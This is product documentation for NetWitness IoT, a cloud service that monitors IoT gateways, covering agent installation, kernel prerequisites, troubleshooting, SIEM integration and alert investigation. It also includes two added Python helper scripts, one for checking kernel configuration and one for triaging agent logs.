1 - Getting Started

Learn how to use NetWitness IoT, the first point of interaction with NetWitness IoT services.

1.1 - Welcome to NetWitness IoT

Every enterprise is adding new IoT devices as part of improving its infrastructure and operation efficiency. The IoT devices include sensors, robots, smart locks, connected cameras, mobile card readers, inventory devices, stock control devices, and other smart devices. The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. This poses a considerable challenge in securing these new IoT devices and protecting the infrastructure and data. NetWitness IoT provides complete visibility into your connected IoT environment.

NetWitness IoT enables organizations to extend their Security Operation Center (SOC) visibility beyond IT and into IoT and OT (Operational Technology).

NetWitness IoT provides the ability to monitor and detect threats end-to-end. For example, an attack initiated from the IT systems and laterally moved to the OT systems can be easily detected. The analysts can get visibility into the complete spectrum of attacks on the entire environment.

NetWitness IoT uses the following technologies to identify security threats and detect compromised IoT devices quickly:

  • Use of latest technology to quickly identify when IoT devices are compromised.
  • Latest behavior analytics.
  • Advanced threat intelligence.

NetWitness IoT transforms organizations by providing the following capabilities:

  • Visibility across the edge and IoT devices using machine learning and behavioral alerting: NetWitness IoT provides enhanced visibility on your IoT devices and alerts you in case of any threats or anomalous activities. The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. NetWitness IoT applies advanced machine learning and behavior analytics, along with advanced threat intelligence, to quickly identify instances where devices could be compromised.
  • Robust investigation capabilities: Rich visualization and reporting capabilities enable security analysts to efficiently investigate anomalous activities. Full meta and drill-down capabilities help you focus on risks, not noise.
  • Quickly respond to threats and reduce risk: NetWitness IoT provides enterprises with capabilities to monitor gateways, servers, and connected devices for all types of behavioral anomalies and produce focused and actionable alerts.
  • Integration with multiple IoT platforms: NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms (JSON, CEF). This type of deployment enables you to prioritize investigations and accelerate incident detection and response. In addition to NetWitness Platform, you can also integrate with other security tools using standard protocols.

1.2 - About NetWitness IoT licenses

NetWitness IoT licenses are valid for the time period associated with the license purchase. NetWitness IoT provides a customer-focused licensing strategy.

The following pricing is annual and can be billed monthly:

Product                    | Price Unit                                            | Storage        | Duration
NetWitness IoT (SaaS only) | Entitles full application with cloud UI for 12 months | 0.5 TB storage | Annual
NetWitness IoT (SaaS only) | Per add-on capacity unit                              | 1 TB storage   | Annual

When an extra capacity unit is added, it is prorated on a monthly basis according to the contract cycle for the primary unit. Contact support to learn more about subscription details and licenses.

1.3 - NetWitness IoT Architecture

NetWitness IoT enables analysts to get complete visibility into the whole spectrum of attacks on the entire environment. The following diagram shows the solution architecture of NetWitness IoT:

[Diagram: NetWitness IoT solution architecture]

In this diagram, the edge components such as the gateways, hosts, and sensors are listed. The RSA cloud service receives the data from the edge components, performs the analytics, and infers insights. The alerts and details are presented to the analysts to take action.

The collector component of the IoT Security Monitor is deployed at the Edge. Typically, it is deployed on an edge gateway or a host that runs an IoT platform for data acquisition and management based on the use cases. The collector collects and sends the security-relevant data from the Edge to the RSA Cloud Service, which performs analytics, detects anomalies, and generates alerts.

Based on this scenario, there are the following two use cases:

  • Use Case 1: The first use case is focused on the plant operator who can directly log into a dashboard and see the alerts, drill down to explore the relevant context, and then take action.
  • Use Case 2: The second use case is focused on the Security Operation Center (SOC). In this case, the alerts generated by IoT Security Monitor are sent to the enterprise monitoring tools, such as NetWitness Platform, which enables the SOC to extend its visibility beyond IT and into the OT side of the environment. The integration with SOC is done using Common Event Format (CEF). CEF is a log management standard that provides an interoperable way to exchange security-related information. Therefore, NetWitness IoT can be integrated with any CEF-compliant IT monitoring tool. NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms including JSON and CEF. This capability helps you easily add advanced security to existing deployments.

Typically, a Small-to-Medium Business (SMB) enterprise may be interested only in the first use case, whereas a large enterprise will most likely benefit from both use cases.

1.4 - Log in to your NetWitness IoT

NetWitness IoT is a cloud solution, and you need to log into your NetWitness IoT to view the alerts and perform the tasks.

To log in to your NetWitness IoT account

  1. Open your browser and type the following URL:

    https://iot.netwitness.com

  2. Click LOGIN and type your email address and password, and then click Sign in.

    The Dashboard page is displayed.

    NetWitness IoT Sign In

1.5 - View Subscription Details

You can view the following details of the NetWitness IoT subscription:

  • License information such as active licenses and license expiry.
  • Used and available storage space based on your subscription.
  • Storage History information such as usage statistics for a period.

To view your subscription details

  1. Log in to NetWitness IoT.
  2. On the top right, click Subscription.

    NetWitness IoT Subscription

2 - Install and setup

Provides information for installing and configuring the agents and troubleshooting any issues.

2.1 - Pre-installation Requirements

The NetWitness IoT agent monitors multiple aspects of the host system and therefore requires privileged access to various parts of it. For the NetWitness IoT agent to operate optimally, the Linux kernel must be configured as described in this section. Before you install the NetWitness IoT agent, verify that the system meets the following requirements.

Configure the Linux kernel with:

  • Conntrack kernel modules
  • Forkstat kernel modules

Supported platforms: the NetWitness IoT agent is available as a standalone binary and as a Docker container. Currently, the NetWitness IoT agent is supported on the following Linux platforms:

  • amd64
  • arm32
  • arm64

NOTE: A beta version of the NetWitness IoT Windows agent is currently available. Contact NetWitness Support and get the application details.

Configure Conntrack Kernel Modules

Conntrack is the name for the Linux kernel subsystem that performs connection tracking. You need to configure Conntrack in one of the following ways:

  • Compile into the Linux kernel
  • Load as kernel modules

The NetWitness IoT agent connects to this kernel service and receives notifications based on network connection changes.

To use this service, make sure of the following:

  • The kernel is configured correctly, where required.
  • The NetWitness IoT agent runs with sufficient privileges to access this service.

If the agent runs outside a container, it must run as root. If Conntrack is used from inside a Docker container, the container needs the NET_ADMIN capability and visibility of the host's network.

Turn on the following kernel options:

  • nf_conntrack_acct
  • nf_conntrack_timestamp

These two kernel options need to be turned on to enhance the Conntrack output, provided the correct module is installed.

NOTE: If you set up the modules correctly, the kernel options will be automatically enabled when the NetWitness IoT agent starts.

Configure Forkstat Kernel Modules

The kernel must be built correctly for Forkstat to function: the CONFIG_PROC_EVENTS and CONFIG_CONNECTOR options must both be enabled. Note that if CONFIG_CONNECTOR is compiled as a loadable module, CONFIG_PROC_EVENTS is not enabled.

Make sure that the kernel configuration looks like the following:

    # if CONFIG_CONNECTOR=m, PROC_EVENTS will not be built
    CONFIG_CONNECTOR=y
    CONFIG_PROC_EVENTS=y

If Conntrack and Forkstat are correctly installed and configured, these details appear in the logs when the NetWitness IoT agent starts. CONFIG_CONNECTOR and CONFIG_PROC_EVENTS must be enabled and have the values shown above for the agent to work. The NetWitness IoT agent prints log messages during startup if any modules are not configured or available in the kernel.

See the Troubleshoot installation issues section for how to verify that Conntrack and Forkstat are correctly enabled and configured.
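As an added example (not part of the NetWitness documentation or the agent), the following Python script checks the requirements above before installation: it parses the running kernel's config for CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y and confirms that the nf_conntrack_acct and nf_conntrack_timestamp sysctl files exist under /proc/sys/net/netfilter. The config locations /proc/config.gz and /boot/config-<release> are standard kernel conventions, and the check functions take already-parsed data so they can be exercised without a real kernel.

```python
"""Pre-installation check for the NetWitness IoT agent's kernel requirements.

Added example, not part of the NetWitness documentation or the agent. It
verifies CONFIG_CONNECTOR=y and CONFIG_PROC_EVENTS=y in the kernel config and
confirms that the nf_conntrack_acct and nf_conntrack_timestamp sysctl files
exist (they only appear once the nf_conntrack module is loaded).
"""
import gzip
import os
import re
from pathlib import Path

REQUIRED_KCONFIG = {"CONFIG_CONNECTOR": "y", "CONFIG_PROC_EVENTS": "y"}
REQUIRED_SYSCTLS = ("nf_conntrack_acct", "nf_conntrack_timestamp")
NETFILTER_DIR = Path("/proc/sys/net/netfilter")

_SET_RE = re.compile(r"^(CONFIG_\w+)=(.+)$")
_UNSET_RE = re.compile(r"^# (CONFIG_\w+) is not set$")


def parse_kconfig(text: str) -> dict:
    """Parse 'CONFIG_X=y|m|...' and '# CONFIG_X is not set' lines into a dict."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if m := _SET_RE.match(line):
            opts[m.group(1)] = m.group(2)
        elif m := _UNSET_RE.match(line):
            opts[m.group(1)] = "n"
    return opts


def check_kconfig(opts: dict) -> list:
    """Return a list of problems; an empty list means the kernel config is OK."""
    problems = []
    for name, want in REQUIRED_KCONFIG.items():
        have = opts.get(name, "n")
        if have == want:
            continue
        if name == "CONFIG_CONNECTOR" and have == "m":
            # PROC_EVENTS depends on CONNECTOR=y; a modular connector cannot
            # carry it, which is the failure mode described in section 2.1.
            problems.append("CONFIG_CONNECTOR=m: CONFIG_PROC_EVENTS cannot be built (need y)")
        else:
            problems.append(f"{name}={have} (need {want})")
    return problems


def check_sysctls(values: dict) -> list:
    """values maps each sysctl name to its file content, or None if absent.

    Only absence is a problem: the agent enables the options itself at
    startup when the module is present (see the NOTE in section 2.1).
    """
    return [
        f"{NETFILTER_DIR / name}: no such file (is nf_conntrack loaded?)"
        for name in REQUIRED_SYSCTLS
        if values.get(name) is None
    ]


def read_sysctls(netfilter_dir: Path = NETFILTER_DIR) -> dict:
    """Read the conntrack sysctl files the agent opens at startup."""
    return {
        name: (netfilter_dir / name).read_text().strip()
        if (netfilter_dir / name).is_file() else None
        for name in REQUIRED_SYSCTLS
    }


def load_running_kconfig() -> dict:
    """Read the running kernel's config from /proc/config.gz or /boot."""
    release = os.uname().release
    for path in (Path("/proc/config.gz"), Path(f"/boot/config-{release}")):
        if path.is_file():
            opener = gzip.open if path.suffix == ".gz" else open
            with opener(path, "rt") as fh:
                return parse_kconfig(fh.read())
    return {}  # no config found: every required option will be reported


def main() -> int:
    problems = check_kconfig(load_running_kconfig()) + check_sysctls(read_sysctls())
    for problem in problems:
        print("FAIL:", problem)
    print("OK: kernel ready for the agent" if not problems
          else f"{len(problems)} problem(s) found; see section 2.1")
    return 1 if problems else 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Run it as root on the gateway before installing the agent; a non-zero exit means at least one requirement from this section is missing.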

2.2 - Install NetWitness Agent

You need to install the NetWitness IoT agent on every host or gateway that you use to manage IoT devices. In NetWitness IoT, a host is also known as the gateway where the NetWitness IoT agent is installed and configured. If you have multiple hosts, you need to install and configure the NetWitness IoT agent on every host. The NetWitness IoT agent image is available in the following formats:

  • Docker
  • Binary

NOTE: A beta version of the NetWitness IoT Windows agent is currently available. Contact NetWitness Customer Support and get the application details.

You need to install the NetWitness IoT agent on a Linux platform. To install and set up NetWitness IoT, download the access key and the agent into the same directory on the host.

NOTE: The installation procedures provided here are focused on manual installation. If you belong to a large organization with multiple gateways, you can integrate the installation process with existing software deployment tools in your organization.

To download and install NetWitness IoT agent using Docker

  1. Log in to NetWitness IoT.

  2. Click Agent.

    NetWitness IoT agent installation

  3. Download RISM-AccessKey-XXXX.csv into the directory where you want to set up the NetWitness IoT agent. For example, you can create the following directory on the host to store the agent and docker files:

    ~/RsaRISM/

  4. To download the Docker image, click DOCKER, and then click the tar file that suits your host:

    • rism-agent-arm32-docker-1.0.tgz
    • rism-agent-arm64-docker-1.0.tgz
    • rism-agent-x86_64-docker-1.0.tgz

NOTE: Make sure that you downloaded the agent tar file and the access key into the ~/RsaRISM/ directory on the host.

  5. To extract the Docker version, use the following command:

    tar xvzf rism-agent-*.tgz

  6. To install the Docker version, run the following command:

    ./run-rism-agent.sh

  7. Follow the on-screen instructions to complete the installation.

To download and install NetWitness IoT agent using Binary

  1. Log in to NetWitness IoT.
  2. Click Agent.

    NetWitness IoT agent installation

  3. Download RISM-AccessKey-XXXX.csv into the directory where you want to set up the NetWitness IoT agent. For example, you can create the following directory on the host to store the agent and docker files:

    ~/RsaRISM/

  4. Click Agent, click BINARY, and then click the tar file that suits your host:

    • rism-agent-arm-binary-1.0.tar
    • rism-agent-arm64-binary-1.0.tar
    • rism-agent-x86_64-binary-1.0.tar

NOTE: Make sure that you downloaded the agent tar file and the access key into the ~/RsaRISM/ directory on the host.

  5. Extract the file you downloaded using the following command (the -z flag is omitted because the download is a plain .tar; GNU tar also detects compression automatically):

    tar xvf rism-agent-*.tar

  6. To install the Binary version, run the following command:

    ./run-rism-agent.sh -b

  7. Follow the on-screen instructions to complete the installation.

To verify successful installation

  • Ensure there are no error messages in logs during NetWitness IoT agent startup.
  • If the installation is successful, the agent will be listed as Gateway when you log into NetWitness IoT.

2.3 - Troubleshoot Installation Issues

If you run into issues with your NetWitness IoT installation, refer to the following information to complete your installation and successfully set up NetWitness IoT.

Here are the issues and resolutions:

Issue 1: conntrack, forkstat not enabled

Log messages to check during agent startup:

    open /proc/sys/net/netfilter/nf_conntrack_timestamp: no such file or directory
    procConnector =
    procEvents =
    netFilterNetlink =
    nfConntrack = m
    nfConntrackIPv4 =
    nfConntrackIPv6 =
    nfConntrackEvents = y
    Written pid(1410523) to /var/run/rsa-rism-agent.pid
    Hostname = gateway-test-machine
    MachineID = 01f84b37c7eb9b8150988036a9890a476749e567ec78b7b575b9ded350a3dddc
    Kernel version = 5.4.24-2.1.0+gbabac008e5cf #1 SMP PREEMPT Thu Dec 17 07:02:31 UTC 2020
    Inside container = true
    IP address = X.X.X.X
    IP addresses = [X.X.X.X]
    Local networks = [{X.X.X.X}]
    nf_conntrack_acct =
    nf_conntrack_timestamp =
    ErrorLog: Unable to start forkstat() process monitoring: unable to create procnotify socket: Protocol not supported
    ErrorLog: Unable to start conntrack() network monitoring: NETLINK error: unable to start conntrack: socket: protocol not supported

Resolution

Enable the conntrack and forkstat modules, and ensure that the nf_conntrack module is loaded and the nf_conntrack_timestamp flag is set to true.

To check whether conntrack_timestamp is enabled and available in the module:

    modinfo nf_conntrack
    ls /proc/sys/net/netfilter/

Issue 2: Firewall blocks out-going traffic

If the network blocks outgoing traffic to AWS, the following errors appear in the agent log and the Gateway is not listed in the NetWitness IoT cloud console.

Log messages to check in the agent:

    AWS: Start authenticating
    AWS: authenticate with Password
    Upload data every 60 seconds
    Upload all data every 60 seconds
    Retrieve time from server
    Get time from http://aws.amazon.com
    Unable to get server time offset: Get "http://aws.amazon.com": dial tcp: lookup aws.amazon.com on [::1]:53: server misbehaving
    Processes(kt,th,pr): new = (0,0,19), live = (0,0,0), dead = (0,0,18)
    AWSS3: authentication error: RequestError: send request failed caused by: Post "https://cognito-idp.us-east-1.amazonaws.com/": dial tcp: lookup cognito-idp.us-east-1.amazonaws.com on [::1]:53: server misbehaving

Resolution

Allow the following URLs and IP ranges through your firewall:

For authentication to access the cloud analytics service:

    URL:      cognito-idp.us-east-1.amazonaws.com
    Protocol: HTTPS

For time sync:

    URL:      aws.amazon.com
    Protocol: http

For S3 (to upload metadata to the cloud analytics service), the following IP ranges:

    54.231.0.0/16
    52.216.0.0/15
    3.5.0.0/19
    44.192.134.240/28
    44.192.140.64/28
    Protocol: HTTPS

For CloudFront (cloud service access), the following IP ranges:

    3.231.2.0/25
    3.234.232.224/27
    3.236.169.192/26
    3.236.48.0/23
    34.195.252.0/24
    34.226.14.0/24
    Protocol: HTTPS

NOTE: The S3 and CloudFront ranges above were fetched from the AWS ip-ranges.json file with the following commands. AWS updates that file regularly, so re-run the commands and refresh the allowlist when uploads start failing again.

    jq -r '[.prefixes[] | select(.region=="us-east-1" and .service=="S3").ip_prefix] | .[]' < ip-ranges.json
    jq -r '[.prefixes[] | select(.region=="us-east-1" and .service=="CLOUDFRONT").ip_prefix] | .[]' < ip-ranges.json

Issue 3: NTP/Time-sync issue with the Host

Log messages to check in the IoT agent:

    Get time from http://aws.amazon.com
    Server time offset is 19787.481 seconds
    upload.process: Unable to upload from Memory - RequestTimeTooSkewed: The difference between the request time and the current time is too large.
    status code: 403, request id: V335V01AYQ3KNTYV, host id: zClioa8xksTUWSM6FQFu/SO0pQ7r6x69m098PAN8P0NxkQox2nER3xwdSaeGxe11tJr3NVa1V0k=

Resolution

The clock on the agent host is out of sync. Synchronize the time with an NTP server and re-run the agent.

Issue 4: How to capture docker agent logs and share with the support team for debugging?

Resolution

Redirect the agent logs to the nwiot-agent.log file:

    docker logs -f rism-agent >& nwiot-agent.log
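The following Python script is an added example, not part of the NetWitness documentation or the agent: it scans captured agent output such as the nwiot-agent.log file produced above for the symptoms quoted in Issues 1 to 3 and reports which resolution applies. The embedded sample log is constructed from those quoted fragments, and the 15-minute clock-skew limit is the one AWS S3 enforces when it returns RequestTimeTooSkewed.

```python
"""Triage of captured NetWitness IoT agent logs.

Added example, not part of the NetWitness documentation or the agent. It
matches the symptoms quoted in Issues 1 to 3 and reports which resolution
applies, so a captured nwiot-agent.log can be classified before escalation.
"""
import re
import sys

# Constructed sample, assembled from the log fragments quoted in Issues 1-3.
SAMPLE_LOG = """\
procConnector =
procEvents =
netFilterNetlink =
nfConntrack = m
nfConntrackEvents = y
Inside container = true
nf_conntrack_acct =
nf_conntrack_timestamp =
ErrorLog: Unable to start forkstat() process monitoring: unable to create procnotify socket: Protocol not supported
ErrorLog: Unable to start conntrack() network monitoring: NETLINK error: unable to start conntrack: socket: protocol not supported
Get time from http://aws.amazon.com
Unable to get server time offset: Get "http://aws.amazon.com": dial tcp: lookup aws.amazon.com on [::1]:53: server misbehaving
AWSS3: authentication error: RequestError: send request failed caused by: Post "https://cognito-idp.us-east-1.amazonaws.com/": dial tcp: lookup cognito-idp.us-east-1.amazonaws.com on [::1]:53: server misbehaving
Server time offset is 19787.481 seconds
upload.process: Unable to upload from Memory - RequestTimeTooSkewed: The difference between the request time and the current time is too large.
"""

# Startup fields that are empty when the kernel lacks the connector / conntrack
# support described in section 2.1 (Issue 1).
REQUIRED_STARTUP_FIELDS = ("procConnector", "procEvents", "nfConntrack")
# S3 rejects requests whose clock differs from AWS time by more than 15 minutes
# with RequestTimeTooSkewed (Issue 3).
MAX_CLOCK_SKEW_SECONDS = 900

_KV_RE = re.compile(r"^(\w+)\s*=\s*(.*)$")
_MONITOR_FAIL_RE = re.compile(r"Unable to start (forkstat|conntrack)\(\)")
_LOOKUP_FAIL_RE = re.compile(r"lookup (\S+) on \S+: server misbehaving")
_OFFSET_RE = re.compile(r"Server time offset is (-?\d+(?:\.\d+)?) seconds")


def _matches(regex, lines):
    """First capture group of every line matching regex, sorted and unique."""
    return sorted({m.group(1) for line in lines if (m := regex.search(line))})


def parse_startup_fields(lines):
    """Collect the 'name = value' lines the agent prints at startup."""
    fields = {}
    for line in lines:
        if m := _KV_RE.match(line.strip()):
            fields[m.group(1)] = m.group(2).strip()
    return fields


def triage(log_text):
    """Map each troubleshooting issue the log exhibits to its evidence."""
    lines = log_text.splitlines()
    fields = parse_startup_fields(lines)
    findings = {}

    # Issue 1: kernel modules / flags not available.
    empty = [f for f in REQUIRED_STARTUP_FIELDS if fields.get(f, "") == ""]
    failed = _matches(_MONITOR_FAIL_RE, lines)
    if empty or failed:
        findings["kernel-modules"] = {"empty_fields": empty, "failed_monitors": failed}

    # Issue 2: outbound traffic to the cloud service blocked (DNS or connect).
    unreachable = _matches(_LOOKUP_FAIL_RE, lines)
    if unreachable:
        findings["network-egress"] = {"unreachable_hosts": unreachable}

    # Issue 3: host clock too far from AWS time for uploads to be accepted.
    offsets = [float(o) for o in _matches(_OFFSET_RE, lines)]
    skewed = any(abs(o) > MAX_CLOCK_SKEW_SECONDS for o in offsets)
    if skewed or any("RequestTimeTooSkewed" in line for line in lines):
        findings["time-skew"] = {"offset_seconds": offsets}
    return findings


RESOLUTIONS = {
    "kernel-modules": "Issue 1: enable the conntrack and forkstat kernel support",
    "network-egress": "Issue 2: allow the cloud endpoints listed above through the firewall",
    "time-skew": "Issue 3: synchronize the host clock with an NTP server",
}


def main(argv):
    text = open(argv[1]).read() if len(argv) > 1 else SAMPLE_LOG
    findings = triage(text)
    for issue, evidence in findings.items():
        print(f"{RESOLUTIONS[issue]} -- evidence: {evidence}")
    if not findings:
        print("No known startup issue found")
    return 1 if findings else 0


if __name__ == "__main__":
    raise SystemExit(main(sys.argv))
```

Run it as `python3 triage.py nwiot-agent.log`; without an argument it classifies the embedded sample.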

Issue 5: Agent is listed as Gateway in cloud but no alerts are generated?

Resolution

If you run into this issue, contact NetWitness Customer Support.

2.4 - Integrate with NetWitness or other SIEM platforms

You can integrate the NetWitness IoT solution with NetWitness Platform or other SIEM solutions to automatically forward the alerts. Analysts can view the alerts related to IoT and review them. Analysts can identify if similar alerts are detected on other entities and understand how it impacts the environment.

NOTE: You can create and manage different destination endpoint groups. The first added Endpoint acts as the primary alert destination, and additional endpoints within a group serve as backups.

To integrate NetWitness IoT with NetWitness Platform

  1. Log in to NetWitness IoT.
  2. Click the Alert Shipper tab.

    NetWitness IoT alert shipper

  3. Click + New Endpoint. The New Endpoint window appears.

    NetWitness IoT alert shipper

  4. Follow the on-screen instructions to add the Endpoint.
  5. After you add an endpoint, enable Alert Shipping.

2.5 - Manage Policies

Policies are a set of monitoring rules targeted at all the IoT devices connected to a gateway on a network.

Using policies, you can:

  • Monitor all Network traffic of IoT devices.
  • Monitor all the processes associated with IoT devices.
  • Detect known rule violations and unseen anomalies in IoT devices.

NOTE: You can only modify an existing policy. You cannot create or delete a policy.

By default, NetWitness IoT provides a set of monitoring policies or rules automatically applied to all the IoT devices connected to the hosts. You can update a policy and define the rules for the policy. For more on the parameters and values, see Parameters and field descriptions of NetWitness IoT alerts.

NOTE: You can modify global policies that are used for generating alerts. You can change policies to set thresholds and generate more alerts. You can ignore some types of events or set threshold limits to control the number of alerts that are generated. For more information, see Update policies based on alerts.

To manage policies

  1. Log in to NetWitness IoT.

  2. Click Policy to open the Policy Configuration page.

    NetWitness IoT Policy Configuration

  3. In the Editor section, modify the required policy parameters.

  4. Click Save.

3 - Investigate

Provides information on using NetWitness IoT to identify and investigate alerts and hosts, and to take action on them.

3.1 - NetWitness IoT for Security Investigation

NetWitness IoT protects your IoT devices by detecting the following types of threats and anomalous behaviors:

  • Blacklisted Process: Alerts when a host launches a process whose executable name exactly matches an entry in the processBlacklist array.
  • Known Risky Outbound Connection: Alerts based on the threat score of the destination IP of an outbound connection, when connections are detected beyond the defined threshold.
  • Anomalous New Connection Volume: Alerts based on how the number of connections during the last hour deviates from the observed baseline.
  • PCR: Compares the volume of traffic leaving a host with the volume of traffic coming into the host, and alerts when this ratio changes significantly from the behavior observed over the previous day.
  • Anomalous Inbound Connection External: Alerts based on changes in the source of inbound connections from the external network compared to previously observed connections.
  • Anomalous Process: Alerts based on running processes that have not been observed on this host in the past.
  • Anomalous Inbound Connection: Alerts based on changes in the source of inbound connections from the local network compared to previously observed connections.

3.2 - View Available Gateways

In NetWitness IoT, a host is also known as the gateway where the NetWitness IoT agent is installed and configured. You can view all the gateways or hosts and learn more about the alerts generated on each gateway. You can view details about each alert, including the date and time stamp of the alert, the severity, meta, and rule associated with the alert.

You can select a gateway, view the status and learn more about the alerts that are generated. You can click an alert, view all the details about the alert, and then take necessary action.

To view available gateways

  1. Log in to NetWitness IoT.

  2. Click the Hosts tab and view available Gateways.

    View available gateways in NetWitness IoT

    The following table lists the parameters on the Hosts page:

  • Alerts: Number of alerts detected on the gateway.
  • Inactive Containers: The number of inactive containers.
  • Active Containers: The number of active containers.
  • Host OS: Information about the operating system of the gateway on which the agent is installed.
  • Modules Loaded: true if all the required modules for the agent are installed on the gateway; otherwise false.
  • IP: The IP address of the gateway on which the agent is installed.
  • Conntrack Acct Enabled: true if the correct Conntrack module is installed and the kernel options (nf_conntrack_acct, nf_conntrack_timestamp) are set; false if the module installed is incorrect and the flags are not set.
  • Real-Time Process Monitoring: true if the gateway on which the agent is installed is not CoreOS; otherwise false.
  • Last Updated: The timestamp at which the cloud service last collected data from the agent.
  • R. Created: The UTC timestamp when the alert was recorded.
  • Rule: Policy rules that are violated, such as Anomalous New Connection Volume and Anomalous Inbound Connection External.
  • Severity: The severity of the alert: Low, Medium, or High.
  • Meta: Brief information about the alert. If you click an alert, a new window displays information such as Endpoint Category, Container, Container Process Profiles, and Endpoint Category (Geo).
  • Actions: The action you performed on each alert: Viewed or False Positive.

3.3 - View Alerts on NetWitness IoT Dashboard

NetWitness IoT provides an intuitive dashboard that simplifies investigations. The rich visualization and reporting capabilities enable efficient investigation of all types of anomalous activities. NetWitness IoT provides full meta and drill-down capabilities to enable analysts to focus on risks.

Using the NetWitness IoT Dashboard, you can:

  • View alerts by severity
  • View alerts for the last 30 days
  • View alerts based on rules
  • View alerts by country
  • View alerts by region

To view alerts on NetWitness IoT Dashboard

  1. Log in to NetWitness IoT.
  2. On the top left, click Dashboard.

    NetWitness IoT dashboard

  3. View widgets on the Dashboard tab to learn more about alerts that are detected based on different categories.
  4. Hover over each element and view the number of alerts detected.

NOTE: NetWitness IoT enables you to view the number of alerts that were detected in a specific period. You can also customize and select a time period and view all the alerts that were detected in that slot.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

3.4 - View all alerts

NetWitness IoT enables you to view all the alerts. You can filter the alerts and find the specific alert.

To view all alerts

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    The Alerts page is displayed.

NetWitness IoT all alerts

You can choose rows per page and view all alerts.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

3.5 - Investigate an Alert

You can view an alert and conduct a detailed investigation on any alert that NetWitness IoT detects.

To investigate an alert

  1. Log in to NetWitness IoT.

  2. Click Alerts.

  3. On the Alerts page, click any alert that you want to investigate.

    The Alert Rule page appears with alert details.

  4. Review the alert details.

  5. To copy the alert data, move the Raw Data toggle switch and copy the raw data.

  6. Use the raw data to conduct further investigation on the alert.

    For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

3.6 - Use Filters to narrow down Alerts for Investigation

You can use filters to narrow down the alerts and further investigate an alert. You can use different filters to find an alert or a set of alerts and then take action.

NOTE: Filter list is dynamic based on alerts in the system. By default, if you do not select a specific category in the filter, you can only view alerts that the system currently generates. If no alert is detected from a specific category, NetWitness IoT does not display that category in the Alert Filters window. For example, if 0 alerts are detected from ANOMALOUS_PROCESS category, then ANOMALOUS_PROCESS category will not be displayed in the Alert Filters window.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To filter alerts

  1. Log in to NetWitness IoT.
  2. Click Alerts.
  3. On the Alerts page, click the Filter icon.
  4. In the Alerts Filters page, select a Policy Rule from the following list:
    • ANOMALOUS_PROCESS
    • ANOMALOUS_OUTBOUND_CONNECTION
    • BLACKLISTED_PROCESS
    • KNOWN_RISKY_INBOUND_CONNECTION
    • PCR
    • UNGRACEFUL_CONTAINER_SHUTDOWN
    • ANOMALOUS_OUTBOUND_CONNECTION_SITELOCAL
    • ANOMALOUS_INBOUND_CONNECTION_CONTAINER
    • ANOMALOUS_INBOUND_CONNECTION_SITELOCAL
    • ANOMALOUS_INBOUND_CONNECTION_EXTERNAL
    • ANOMALOUS_OUTBOUND_CONNECTION_BY_CLASSIFICATION
    • ANOMALOUS_NEW_CONNECTION_VOLUME
  5. Choose a date and time.
  6. Select a severity from the list:
    • High
    • Medium
    • Low
  7. Choose a country from the list.
    • Select False Positive.
    • Select Viewed Alerts.
  8. Click Close.

3.7 - Investigate Hosts

The NetWitness agent is deployed on every gateway or host and collects data from all the devices that are connected to these hosts. You can go to the Gateways and view all the alerts that were detected. You can review the details of an alert and conduct a detailed investigation. You can assign the status as viewed for each alert. If you find an alert invalid, you can mark it as a false positive.

NOTE: To investigate, you can also get more details about an alert from the Alerts page or the Hosts page.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To investigate hosts

  1. Log in to NetWitness IoT.

  2. Click Hosts.

    Available Gateways are listed on the left panel.

  3. Click a Gateway to see the alerts.

    You can choose different gateways and see the list of alerts detected on that gateway or host.

  4. On the left panel, review the list of alerts that were detected on that gateway.

  5. Click an alert.

    The Alert Rule window lists the details of the alert.

  6. Review the alert details.

  7. Toggle the Raw Alert and copy the strings.

    You can continue to analyze and take action on these alerts.

3.8 - Take Action on Alerts

You can view all the alerts detected on each gateway or host and take action on each alert. When you finish investigating an alert, you can mark it as Viewed. When you search for alerts, the Viewed category helps you filter out alerts that are already marked as viewed, which saves time and effort in finding the right alert to respond to.

When you investigate an alert, if you notice that an alert is not valid, you can mark the alert as False Positive. When you mark an alert as false positive, you can use the filters to hide the invalid alerts and focus on the valid alerts.

For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To identify an alert as False Positive

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    You can also click the Hosts tab and find alerts that are detected on different gateways.

  3. Click an alert.
    The Alert Rule window lists the details of the alert.

  4. Review the alert details.

  5. If you determine that the alert is invalid because the detected activity is legitimate, on the top right, click False Positive.

    When you mark an alert as false positive, you can use the filters to hide the alert and focus on the valid alerts.

To mark the alert as Viewed

  1. Log in to NetWitness IoT.

  2. Click Alerts.

    You can also click the Hosts tab and find alerts that are detected on different gateways.

  3. Review the alert details

  4. To mark the alert as viewed, on the top right, click Viewed.

    When you mark an alert as Viewed, you can use the filters to hide the alerts you reviewed and focus on the new alerts.

3.9 - Update Policies based on Alerts

You can modify the global policies that NetWitness IoT uses to generate alerts. Tuning a policy lets you control the number of alerts that are generated: you can adjust threshold limits so that more or fewer alerts fire, or ignore some types of events altogether.

NOTE: Updating a policy changes the way alerts are generated for every gateway and host it applies to, so review the effect of each change carefully before saving it. For more information about the parameter and field descriptions of NetWitness IoT alerts, see Parameters and field descriptions of NetWitness IoT alerts.

To change policies for alerts

  1. Log in to NetWitness IoT.

  2. Click Policy.

  3. On the right panel, under Editor, modify a policy.

    The Definitions panel lists the policy parameters that you can use for tuning the policies.

  4. Do one of the following:

    • To save your changes, click SAVE.
    • To discard your changes, click DISCARD.

3.10 - Parameters and Field Descriptions of NetWitness IoT Alerts

This topic describes the parameters and fields of a NetWitness IoT alert record. The core fields are present on every alert; the extended fields under meta are present only for the rule types noted in each description.

Core field descriptions

Field Description
